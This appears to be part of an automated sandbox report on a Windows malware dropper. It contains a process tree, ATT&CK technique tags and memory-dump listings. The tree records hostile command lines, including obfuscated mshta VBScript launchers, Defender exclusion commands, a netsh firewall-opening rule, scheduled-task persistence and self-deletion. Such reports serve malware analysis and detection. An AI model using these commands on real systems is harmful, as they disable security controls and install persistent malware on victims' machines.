        "C:\Users\Admin\Pictures\Adobe Films\JtTRAPEj3BAWzuYvttlULwXi.exe"
        6⤵
        
        PID:5760
        
        C:\Users\Admin\Pictures\Adobe Films\JtTRAPEj3BAWzuYvttlULwXi.exe
        
        "C:\Users\Admin\Pictures\Adobe Films\JtTRAPEj3BAWzuYvttlULwXi.exe"
        7⤵
        
        PID:4524
      - C:\Users\Admin\Pictures\Adobe Films\Lj2hifzHrgKgIu3z3ArpQYQJ.exe
        
        "C:\Users\Admin\Pictures\Adobe Films\Lj2hifzHrgKgIu3z3ArpQYQJ.exe"
        6⤵
        
        PID:5840
      - C:\Users\Admin\Pictures\Adobe Films\i2SUjV2Kd6Dj6OjxALvTvz3k.exe
        
        "C:\Users\Admin\Pictures\Adobe Films\i2SUjV2Kd6Dj6OjxALvTvz3k.exe"
        6⤵
        
        PID:5860
        
        C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
        
        "C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe"
        7⤵
        
        PID:4820
        
        C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 5860 -s 556
        7⤵
        Program crash
        
        PID:2840
      - C:\Users\Admin\Pictures\Adobe Films\DgviR57QAfnwhemTkfzgYNyt.exe
        
        "C:\Users\Admin\Pictures\Adobe Films\DgviR57QAfnwhemTkfzgYNyt.exe"
        6⤵
        
        PID:5936
      - C:\Users\Admin\Pictures\Adobe Films\JyUGG8ZhshCwx_OcqOMIUhEF.exe
        
        "C:\Users\Admin\Pictures\Adobe Films\JyUGG8ZhshCwx_OcqOMIUhEF.exe"
        6⤵
        
        PID:6080
        
        C:\Users\Admin\AppData\Roaming\3373962.exe
        
        "C:\Users\Admin\AppData\Roaming\3373962.exe"
        7⤵
        
        PID:4500
        
        C:\Users\Admin\AppData\Roaming\2612012.exe
        
        "C:\Users\Admin\AppData\Roaming\2612012.exe"
        7⤵
        
        PID:668
        
        C:\Users\Admin\AppData\Roaming\WinHost\WinHoster.exe
        
        "C:\Users\Admin\AppData\Roaming\WinHost\WinHoster.exe"
        8⤵
        
        PID:1368
        
        C:\Users\Admin\AppData\Roaming\7533714.exe
        
        "C:\Users\Admin\AppData\Roaming\7533714.exe"
        7⤵
        
        PID:1580
        
        C:\Users\Admin\AppData\Roaming\897046.exe
        
        "C:\Users\Admin\AppData\Roaming\897046.exe"
        7⤵
        
        PID:1708
        
        C:\Users\Admin\AppData\Roaming\3505161.exe
        
        "C:\Users\Admin\AppData\Roaming\3505161.exe"
        7⤵
        
        PID:1320
        
        C:\Users\Admin\AppData\Roaming\8456548.exe
        
        "C:\Users\Admin\AppData\Roaming\8456548.exe"
        7⤵
        
        PID:4744
        
        C:\Windows\SysWOW64\mshta.exe
        
        "C:\Windows\System32\mshta.exe" VbscRIpT:cLosE ( cREaTeOBjeCT ("wsCriPT.sHELl"). rUN ("Cmd.exe /q /c Type ""C:\Users\Admin\AppData\Roaming\8456548.exe"" > kSTw_GRvR1eDFi.EXE && StARt kStW_grVR1EDFi.exE /P6l3hjJm2mK1sJpxUmLJ & If """"== """" for %k In ( ""C:\Users\Admin\AppData\Roaming\8456548.exe"" ) do taskkill /F /Im ""%~Nxk"" " ,0 , trUE) )
        8⤵
        
        PID:5080
        
        C:\Users\Admin\AppData\Roaming\191858.exe
        
        "C:\Users\Admin\AppData\Roaming\191858.exe"
        7⤵
        
        PID:4092
      - C:\Users\Admin\Pictures\Adobe Films\xAXXbuwVJOVHjWWwGnchLzty.exe
        
        "C:\Users\Admin\Pictures\Adobe Films\xAXXbuwVJOVHjWWwGnchLzty.exe"
        6⤵
        
        PID:5480
        
        C:\Program Files (x86)\Company\NewProduct\cutm3.exe
        
        "C:\Program Files (x86)\Company\NewProduct\cutm3.exe"
        7⤵
        
        PID:3748
      - C:\Users\Admin\Pictures\Adobe Films\GTc5I1gIhgVyvCxSQyP_RkeN.exe
        
        "C:\Users\Admin\Pictures\Adobe Films\GTc5I1gIhgVyvCxSQyP_RkeN.exe"
        6⤵
        
        PID:1472
        
        C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
        
        "C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe"
        7⤵
        
        PID:2256
        
        C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 1472 -s 552
        7⤵
        Program crash
        
        PID:5520
      - C:\Users\Admin\Pictures\Adobe Films\Umi9K2BTSRv7LV1xeoNGc_e0.exe
        
        "C:\Users\Admin\Pictures\Adobe Films\Umi9K2BTSRv7LV1xeoNGc_e0.exe"
        6⤵
        
        PID:4756
        
        C:\Windows\SysWOW64\cmd.exe
        
        cmd.exe /c taskkill /f /im chrome.exe
        7⤵
        
        PID:5792
        
        C:\Windows\SysWOW64\taskkill.exe
        
        taskkill /f /im chrome.exe
        8⤵
        Kills process with taskkill
        
        PID:2852
      - C:\Users\Admin\Pictures\Adobe Films\8x7VTOHtYSdxAyeVZL7f6JWJ.exe
        
        "C:\Users\Admin\Pictures\Adobe Films\8x7VTOHtYSdxAyeVZL7f6JWJ.exe"
        6⤵
        
        PID:4476
      - C:\Users\Admin\Pictures\Adobe Films\0aRNFNC6TQSXHCFejSkOawlM.exe
        
        "C:\Users\Admin\Pictures\Adobe Films\0aRNFNC6TQSXHCFejSkOawlM.exe"
        6⤵
        
        PID:644
      - C:\Users\Admin\Pictures\Adobe Films\3gOq1aKfkEVmOPJDlS9Y5elc.exe
        
        "C:\Users\Admin\Pictures\Adobe Films\3gOq1aKfkEVmOPJDlS9Y5elc.exe"
        6⤵
        
        PID:4816
      - C:\Users\Admin\Pictures\Adobe Films\LqtZbRFYnzVdFeFpH9I1ktdG.exe
        
        "C:\Users\Admin\Pictures\Adobe Films\LqtZbRFYnzVdFeFpH9I1ktdG.exe"
        6⤵
        
        PID:6044
      - C:\Users\Admin\Pictures\Adobe Films\3qLtW0WjcWiatCrsfQXg71PZ.exe
        
        "C:\Users\Admin\Pictures\Adobe Films\3qLtW0WjcWiatCrsfQXg71PZ.exe"
        6⤵
        
        PID:5416
        
        C:\Windows\SysWOW64\mshta.exe
        
        "C:\Windows\System32\mshta.exe" VBsCRIPt:cLose( creAteObjecT("WScRipT.SHElL" ). RuN ( "CMd /r CopY /y ""C:\Users\Admin\Pictures\Adobe Films\3qLtW0WjcWiatCrsfQXg71PZ.exe"" 8pWB.eXE&& sTaRT 8pWB.eXe /pO_wtib1KE0hzl7U9_CYP & If """"== """" for %K iN ( ""C:\Users\Admin\Pictures\Adobe Films\3qLtW0WjcWiatCrsfQXg71PZ.exe"" ) do taskkill -im ""%~NxK"" -F " ,0, trUE ) )
        7⤵
        
        PID:5272
      - C:\Users\Admin\Pictures\Adobe Films\aGBc1RPhYmUEZMDJ0xZTdz50.exe
        
        "C:\Users\Admin\Pictures\Adobe Films\aGBc1RPhYmUEZMDJ0xZTdz50.exe"
        6⤵
        
        PID:3304
      - C:\Users\Admin\Pictures\Adobe Films\f2YAVw0vN1CDmQImwBPpi20v.exe
        
        "C:\Users\Admin\Pictures\Adobe Films\f2YAVw0vN1CDmQImwBPpi20v.exe"
        6⤵
        
        PID:4844
      - C:\Users\Admin\Pictures\Adobe Films\aRIQQr_pEh8Qy9n33GgzRkvP.exe
        
        "C:\Users\Admin\Pictures\Adobe Films\aRIQQr_pEh8Qy9n33GgzRkvP.exe"
        6⤵
        
        PID:5876
      - C:\Users\Admin\Pictures\Adobe Films\qucWFSF813A9wl3zv6kjaSyC.exe
        
        "C:\Users\Admin\Pictures\Adobe Films\qucWFSF813A9wl3zv6kjaSyC.exe"
        6⤵
        
        PID:2096
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath c:\windows\
        7⤵
        
        PID:5712
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath \\?\C:\Windows \
        7⤵
        
        PID:2924
        
        C:\Windows\System32\netsh.exe
        
        "C:\Windows\System32\netsh.exe" advfirewall firewall add rule name="SvcHostX" dir=in action=allow program="C:\Windows\System\svchost.exe" enable=yes
        7⤵
        
        PID:6152
      - C:\Users\Admin\Pictures\Adobe Films\IdI8jMzuK9r6RGNXHWTqHMW1.exe
        
        "C:\Users\Admin\Pictures\Adobe Films\IdI8jMzuK9r6RGNXHWTqHMW1.exe"
        6⤵
        
        PID:4272
      - C:\Users\Admin\Pictures\Adobe Films\ydE15F13iKsJ0Y_xXWg51S9_.exe
        
        "C:\Users\Admin\Pictures\Adobe Films\ydE15F13iKsJ0Y_xXWg51S9_.exe"
        6⤵
        
        PID:6116
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c Fri0471ced4d802994.exe
      4⤵
      PID:4024
    - - C:\Users\Admin\AppData\Local\Temp\7zS0D4E0B36\Fri0471ced4d802994.exe
        
        Fri0471ced4d802994.exe
        5⤵
        Executes dropped EXE
        
        PID:4080
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c Fri047a1b6fc980f8.exe
      4⤵
      PID:876
    - - C:\Users\Admin\AppData\Local\Temp\7zS0D4E0B36\Fri047a1b6fc980f8.exe
        
        Fri047a1b6fc980f8.exe
        5⤵
        Executes dropped EXE
        
        PID:1420
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c Fri042d82e64f594.exe
      4⤵
      PID:932
    - - C:\Users\Admin\AppData\Local\Temp\7zS0D4E0B36\Fri042d82e64f594.exe
        
        Fri042d82e64f594.exe
        5⤵
        Executes dropped EXE
        
        PID:3968
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c Fri040df945a5.exe /mixone
      4⤵
      PID:764
    - - C:\Users\Admin\AppData\Local\Temp\7zS0D4E0B36\Fri040df945a5.exe
        
        Fri040df945a5.exe /mixone
        5⤵
        Executes dropped EXE
        
        PID:1068
      - C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 1068 -s 668
        6⤵
        Program crash
        
        PID:4580
      - C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 1068 -s 672
        6⤵
        Program crash
        
        PID:4704
      - C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 1068 -s 736
        6⤵
        Program crash
        
        PID:4996
      - C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 1068 -s 820
        6⤵
        Program crash
        
        PID:3372
      - C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 1068 -s 892
        6⤵
        Program crash
        
        PID:1176
      - C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 1068 -s 940
        6⤵
        Program crash
        
        PID:5200
      - C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 1068 -s 1112
        6⤵
        Program crash
        
        PID:5668
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c Fri0431de7a47.exe
      4⤵
      PID:1220
    - - C:\Users\Admin\AppData\Local\Temp\7zS0D4E0B36\Fri0431de7a47.exe
        
        Fri0431de7a47.exe
        5⤵
        Executes dropped EXE
        
        PID:3160
      - C:\Users\Admin\AppData\Local\Temp\7zS0D4E0B36\Fri0431de7a47.exe
        
        C:\Users\Admin\AppData\Local\Temp\7zS0D4E0B36\Fri0431de7a47.exe
        6⤵
        
        PID:4016
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c Fri043a70f76ef98.exe
      4⤵
      PID:2136
    - - C:\Users\Admin\AppData\Local\Temp\7zS0D4E0B36\Fri043a70f76ef98.exe
        
        Fri043a70f76ef98.exe
        5⤵
        Executes dropped EXE
        
        PID:652
      - C:\Users\Admin\Pictures\Adobe Films\cBWlpDeb8KNkxWSpE9onw3YZ.exe
        
        "C:\Users\Admin\Pictures\Adobe Films\cBWlpDeb8KNkxWSpE9onw3YZ.exe"
        6⤵
        
        PID:5108
      - C:\Users\Admin\Pictures\Adobe Films\1W1a_lh3Yc8JfZ2YPPg23wJB.exe
        
        "C:\Users\Admin\Pictures\Adobe Films\1W1a_lh3Yc8JfZ2YPPg23wJB.exe"
        6⤵
        
        PID:5464
        
        C:\Users\Admin\Documents\lSp21qSC06YoyM9GfYOEHybu.exe
        
        "C:\Users\Admin\Documents\lSp21qSC06YoyM9GfYOEHybu.exe"
        7⤵
        
        PID:5196
        
        C:\Windows\SysWOW64\schtasks.exe
        
        schtasks /create /f /RU "Admin" /tr "C:\Program Files (x86)\PowerControl\PowerControl_Svc.exe" /tn "PowerControl LG" /sc ONLOGON /rl HIGHEST
        7⤵
        Creates scheduled task(s)
        
        PID:3796
        
        C:\Windows\SysWOW64\schtasks.exe
        
        schtasks /create /f /RU "Admin" /tr "C:\Program Files (x86)\PowerControl\PowerControl_Svc.exe" /tn "PowerControl HR" /sc HOURLY /rl HIGHEST
        7⤵
        Creates scheduled task(s)
        
        PID:5096
      - C:\Users\Admin\Pictures\Adobe Films\ydE15F13iKsJ0Y_xXWg51S9_.exe
        
        "C:\Users\Admin\Pictures\Adobe Films\ydE15F13iKsJ0Y_xXWg51S9_.exe"
        6⤵
        
        PID:5628
        
        C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c taskkill /im ydE15F13iKsJ0Y_xXWg51S9_.exe /f & timeout /t 6 & del /f /q "C:\Users\Admin\Pictures\Adobe Films\ydE15F13iKsJ0Y_xXWg51S9_.exe" & del C:\ProgramData\*.dll & exit
        7⤵
        
        PID:4576
        
        C:\Windows\SysWOW64\taskkill.exe
        
        taskkill /im ydE15F13iKsJ0Y_xXWg51S9_.exe /f
        8⤵
        Kills process with taskkill
        
        PID:288
      - C:\Users\Admin\Pictures\Adobe Films\8x7VTOHtYSdxAyeVZL7f6JWJ.exe
        
        "C:\Users\Admin\Pictures\Adobe Films\8x7VTOHtYSdxAyeVZL7f6JWJ.exe"
        6⤵
        
        PID:5688
      - C:\Users\Admin\Pictures\Adobe Films\Lj2hifzHrgKgIu3z3ArpQYQJ.exe
        
        "C:\Users\Admin\Pictures\Adobe Films\Lj2hifzHrgKgIu3z3ArpQYQJ.exe"
        6⤵
        
        PID:5828
  - - C:\Windows\SysWOW64\WerFault.exe
      C:\Windows\SysWOW64\WerFault.exe -u -p 1436 -s 616
      4⤵
      Program crash
      Suspicious use of AdjustPrivilegeToken
      PID:2028
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c Fri0470d89df3bb718.exe
      4⤵
      PID:1916
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c Fri04a13875aa1c59b58.exe
      4⤵
      PID:1600
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c Fri0480a54c0d2a7.exe
      4⤵
      PID:2892

C:\Users\Admin\AppData\Local\Temp\7zS0D4E0B36\Fri0470d89df3bb718.exe
Fri0470d89df3bb718.exe
1⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:4040

C:\Users\Admin\AppData\Local\Temp\7zS0D4E0B36\Fri0480a54c0d2a7.exe
Fri0480a54c0d2a7.exe
1⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:700
- C:\Windows\SysWOW64\cmd.exe
  cmd.exe /c taskkill /f /im chrome.exe
  2⤵
  PID:3604
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /f /im chrome.exe
    3⤵
    - Kills process with taskkill
    PID:4536

C:\Users\Admin\AppData\Local\Temp\7zS0D4E0B36\Fri04a13875aa1c59b58.exe
Fri04a13875aa1c59b58.exe
1⤵
- Executes dropped EXE
PID:3220

C:\Users\Admin\AppData\Local\Temp\is-UEIP9.tmp\Fri0471ced4d802994.tmp
"C:\Users\Admin\AppData\Local\Temp\is-UEIP9.tmp\Fri0471ced4d802994.tmp" /SL5="$20084,140785,56832,C:\Users\Admin\AppData\Local\Temp\7zS0D4E0B36\Fri0471ced4d802994.exe"
1⤵
- Executes dropped EXE
- Loads dropped DLL
PID:3104
- C:\Users\Admin\AppData\Local\Temp\7zS0D4E0B36\Fri0471ced4d802994.exe
  "C:\Users\Admin\AppData\Local\Temp\7zS0D4E0B36\Fri0471ced4d802994.exe" /SILENT
  2⤵
  PID:3500
- - C:\Users\Admin\AppData\Local\Temp\is-GD8NG.tmp\Fri0471ced4d802994.tmp
    "C:\Users\Admin\AppData\Local\Temp\is-GD8NG.tmp\Fri0471ced4d802994.tmp" /SL5="$300D4,140785,56832,C:\Users\Admin\AppData\Local\Temp\7zS0D4E0B36\Fri0471ced4d802994.exe" /SILENT
    3⤵
    PID:3764

C:\Windows\system32\rundll32.exe
rundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global
1⤵
- Process spawned unexpected child process
PID:4676
- C:\Windows\SysWOW64\rundll32.exe
  rundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global
  2⤵
  PID:4820

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k SystemNetworkService
1⤵
PID:476

Network

MITRE ATT&CK Enterprise v6

Initial Access

Execution

Scheduled Task

T1053

Persistence

Modify Existing Service

T1031

Scheduled Task

T1053

Privilege Escalation

Scheduled Task

T1053

Defense Evasion

Web Service

T1102

Credential Access

Discovery

System Information Discovery

T1082

Lateral Movement

Collection

Command and Control

Web Service

T1102

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

memory/476-523-0x000001A7EB000000-0x000001A7EB072000-memory.dmp

Filesize
456KB

Download
memory/652-347-0x0000000005A80000-0x0000000005BCC000-memory.dmp

Filesize
1.3MB

Download
memory/808-562-0x0000023268350000-0x00000232683C2000-memory.dmp

Filesize
456KB

Download
memory/1012-528-0x000001C310A60000-0x000001C310AD2000-memory.dmp

Filesize
456KB

Download
memory/1068-322-0x0000000000680000-0x00000000007CA000-memory.dmp

Filesize
1.3MB

Download
memory/1068-325-0x0000000000400000-0x000000000058E000-memory.dmp

Filesize
1.6MB

Download
memory/1100-558-0x000002AB81760000-0x000002AB817D2000-memory.dmp

Filesize
456KB

Download
memory/1152-578-0x0000028C09D10000-0x0000028C09D82000-memory.dmp

Filesize
456KB

Download
memory/1312-275-0x0000000000400000-0x0000000000420000-memory.dmp

Filesize
128KB

Download
memory/1312-316-0x0000000004CC0000-0x00000000052C6000-memory.dmp

Filesize
6.0MB

Download
memory/1344-587-0x0000013971060000-0x00000139710D2000-memory.dmp

Filesize
456KB

Download
memory/1352-568-0x0000025D431A0000-0x0000025D43212000-memory.dmp

Filesize
456KB

Download
memory/1360-296-0x0000000007A40000-0x0000000007A41000-memory.dmp

Filesize
4KB

Download
memory/1360-215-0x00000000046F0000-0x00000000046F1000-memory.dmp

Filesize
4KB

Download
memory/1360-299-0x0000000007BD0000-0x0000000007BD1000-memory.dmp

Filesize
4KB

Download
memory/1360-297-0x0000000007B20000-0x0000000007B21000-memory.dmp

Filesize
4KB

Download
memory/1360-248-0x0000000004840000-0x0000000004841000-memory.dmp

Filesize
4KB

Download
memory/1360-241-0x0000000004850000-0x0000000004851000-memory.dmp

Filesize
4KB

Download
memory/1360-407-0x0000000004843000-0x0000000004844000-memory.dmp

Filesize
4KB

Download
memory/1360-389-0x000000007E330000-0x000000007E331000-memory.dmp

Filesize
4KB

Download
memory/1360-291-0x00000000078A0000-0x00000000078A1000-memory.dmp

Filesize
4KB

Download
memory/1360-219-0x00000000046F0000-0x00000000046F1000-memory.dmp

Filesize
4KB

Download
memory/1360-247-0x0000000004842000-0x0000000004843000-memory.dmp

Filesize
4KB

Download
memory/1420-272-0x0000000002D00000-0x0000000002D09000-memory.dmp

Filesize
36KB

Download
memory/1420-295-0x0000000000400000-0x0000000002BAF000-memory.dmp

Filesize
39.7MB

Download
memory/1436-141-0x000000006FE40000-0x000000006FFC6000-memory.dmp

Filesize
1.5MB

Download
memory/1436-145-0x0000000064940000-0x0000000064959000-memory.dmp

Filesize
100KB

Download
memory/1436-136-0x000000006B440000-0x000000006B4CF000-memory.dmp

Filesize
572KB

Download
memory/1436-135-0x000000006B440000-0x000000006B4CF000-memory.dmp

Filesize
572KB

Download
memory/1436-140-0x000000006FE40000-0x000000006FFC6000-memory.dmp

Filesize
1.5MB

Download
memory/1436-139-0x000000006FE40000-0x000000006FFC6000-memory.dmp

Filesize
1.5MB

Download
memory/1436-143-0x0000000064940000-0x0000000064959000-memory.dmp

Filesize
100KB

Download
memory/1436-142-0x000000006B280000-0x000000006B2A6000-memory.dmp

Filesize
152KB

Download
memory/1436-137-0x000000006B440000-0x000000006B4CF000-memory.dmp

Filesize
572KB

Download
memory/1436-146-0x0000000064940000-0x0000000064959000-memory.dmp

Filesize
100KB

Download
memory/1436-138-0x000000006FE40000-0x000000006FFC6000-memory.dmp

Filesize
1.5MB

Download
memory/1436-144-0x0000000064940000-0x0000000064959000-memory.dmp

Filesize
100KB

Download
memory/1668-321-0x0000000002BD0000-0x0000000002C7E000-memory.dmp

Filesize
696KB

Download
memory/1668-327-0x0000000000400000-0x0000000002BC8000-memory.dmp

Filesize
39.8MB

Download
memory/1864-565-0x000001E9CF8C0000-0x000001E9CF932000-memory.dmp

Filesize
456KB

Download
memory/2088-292-0x0000000005C80000-0x0000000005C81000-memory.dmp

Filesize
4KB

Download
memory/2088-274-0x0000000000400000-0x0000000000420000-memory.dmp

Filesize
128KB

Download
memory/2088-317-0x0000000005670000-0x0000000005C76000-memory.dmp

Filesize
6.0MB

Download
memory/2264-328-0x0000000001270000-0x0000000001286000-memory.dmp

Filesize
88KB

Download
memory/2292-532-0x0000024058170000-0x00000240581E2000-memory.dmp

Filesize
456KB

Download
memory/2316-526-0x0000022C63350000-0x0000022C633C2000-memory.dmp

Filesize
456KB

Download
memory/2480-519-0x0000016E47D80000-0x0000016E47DF2000-memory.dmp

Filesize
456KB

Download
memory/2548-589-0x0000016957E00000-0x0000016957E72000-memory.dmp

Filesize
456KB

Download
memory/2556-595-0x0000025F7A640000-0x0000025F7A6B2000-memory.dmp

Filesize
456KB

Download
memory/2776-346-0x00000000061E0000-0x000000000632C000-memory.dmp

Filesize
1.3MB

Download
memory/2976-258-0x0000000005B00000-0x0000000005B01000-memory.dmp

Filesize
4KB

Download
memory/2976-252-0x0000000005440000-0x0000000005441000-memory.dmp

Filesize
4KB

Download
memory/2976-255-0x00000000055F0000-0x00000000055F1000-memory.dmp

Filesize
4KB

Download
memory/2976-227-0x0000000000C70000-0x0000000000C71000-memory.dmp

Filesize
4KB

Download
memory/3104-239-0x00000000001E0000-0x00000000001E1000-memory.dmp

Filesize
4KB

Download
memory/3160-257-0x0000000002270000-0x00000000022E6000-memory.dmp

Filesize
472KB

Download
memory/3160-226-0x0000000000040000-0x0000000000041000-memory.dmp

Filesize
4KB

Download
memory/3160-236-0x0000000004840000-0x0000000004841000-memory.dmp

Filesize
4KB

Download
memory/3220-230-0x0000000000850000-0x0000000000851000-memory.dmp

Filesize
4KB

Download
memory/3220-249-0x00000000011B0000-0x00000000011B1000-memory.dmp

Filesize
4KB

Download
memory/3220-240-0x0000000001200000-0x0000000001201000-memory.dmp

Filesize
4KB

Download
memory/3348-487-0x000001CE26D80000-0x000001CE26DCD000-memory.dmp

Filesize
308KB

Download
memory/3348-483-0x000001CE26E40000-0x000001CE26EB2000-memory.dmp

Filesize
456KB

Download
memory/3372-228-0x00000000009E0000-0x00000000009E1000-memory.dmp

Filesize
4KB

Download
memory/3372-256-0x00000000051A0000-0x0000000005216000-memory.dmp

Filesize
472KB

Download
memory/3500-270-0x0000000000400000-0x0000000000414000-memory.dmp

Filesize
80KB

Download
memory/3764-271-0x00000000001E0000-0x00000000001E1000-memory.dmp

Filesize
4KB

Download
memory/4016-315-0x00000000054A0000-0x0000000005AA6000-memory.dmp

Filesize
6.0MB

Download
memory/4016-277-0x0000000000400000-0x0000000000420000-memory.dmp

Filesize
128KB

Download
memory/4016-300-0x00000000054F0000-0x00000000054F1000-memory.dmp

Filesize
4KB

Download
memory/4016-304-0x0000000005620000-0x0000000005621000-memory.dmp

Filesize
4KB

Download
memory/4040-204-0x0000000000A70000-0x0000000000A71000-memory.dmp

Filesize
4KB

Download
memory/4040-220-0x000000001B6D0000-0x000000001B6D2000-memory.dmp

Filesize
8KB

Download
memory/4080-217-0x0000000000400000-0x0000000000414000-memory.dmp

Filesize
80KB

Download
memory/4092-216-0x0000000000C90000-0x0000000000C91000-memory.dmp

Filesize
4KB

Download
memory/4092-244-0x0000000007100000-0x0000000007101000-memory.dmp

Filesize
4KB

Download
memory/4092-243-0x0000000004A10000-0x0000000004A11000-memory.dmp

Filesize
4KB

Download
memory/4092-221-0x0000000000C90000-0x0000000000C91000-memory.dmp

Filesize
4KB

Download
memory/4092-409-0x0000000004A13000-0x0000000004A14000-memory.dmp

Filesize
4KB

Download
memory/4092-245-0x0000000004A12000-0x0000000004A13000-memory.dmp

Filesize
4KB

Download
memory/4092-386-0x000000007F740000-0x000000007F741000-memory.dmp

Filesize
4KB

Download
memory/4820-480-0x00000000049C0000-0x0000000004A1D000-memory.dmp

Filesize
372KB

Download
memory/4820-476-0x0000000004829000-0x000000000492A000-memory.dmp

Filesize
1.0MB

Download
memory/5564-600-0x0000000000400000-0x000000000043A000-memory.dmp

Filesize
232KB

Download
memory/5564-596-0x0000000000520000-0x0000000000528000-memory.dmp

Filesize
32KB

Download
memory/5564-597-0x0000000001F20000-0x0000000001F29000-memory.dmp

Filesize
36KB

Download
memory/5628-599-0x0000000002210000-0x00000000022E5000-memory.dmp

Filesize
852KB

Download
memory/5628-598-0x0000000002050000-0x00000000020CB000-memory.dmp

Filesize
492KB

Download
memory/5628-604-0x0000000000400000-0x00000000004D8000-memory.dmp

Filesize
864KB

Download
memory/5716-601-0x0000000001F90000-0x0000000001FB7000-memory.dmp

Filesize
156KB

Download
memory/5716-602-0x0000000001FC0000-0x0000000002004000-memory.dmp

Filesize
272KB

Download
memory/5716-603-0x0000000000400000-0x000000000045E000-memory.dmp

Filesize
376KB

Download
memory/5860-605-0x0000000000A70000-0x0000000000AD0000-memory.dmp

Filesize
384KB

Download
memory/5860-607-0x0000000002840000-0x0000000002841000-memory.dmp

Filesize
4KB

Download
memory/5860-611-0x0000000002860000-0x0000000002861000-memory.dmp

Filesize
4KB

Download
memory/5860-609-0x00000000027F0000-0x00000000027F1000-memory.dmp

Filesize
4KB

Download
memory/5860-606-0x0000000002830000-0x0000000002831000-memory.dmp

Filesize
4KB

Download

Resubmissions

Analysis

Sharing

General

Malware Config

Extracted

Extracted

Extracted

Extracted

Extracted

Extracted

Signatures

Processes

Network

MITRE ATT&CK Enterprise v6

Replay Monitor

Loading Replay Monitor...

Downloads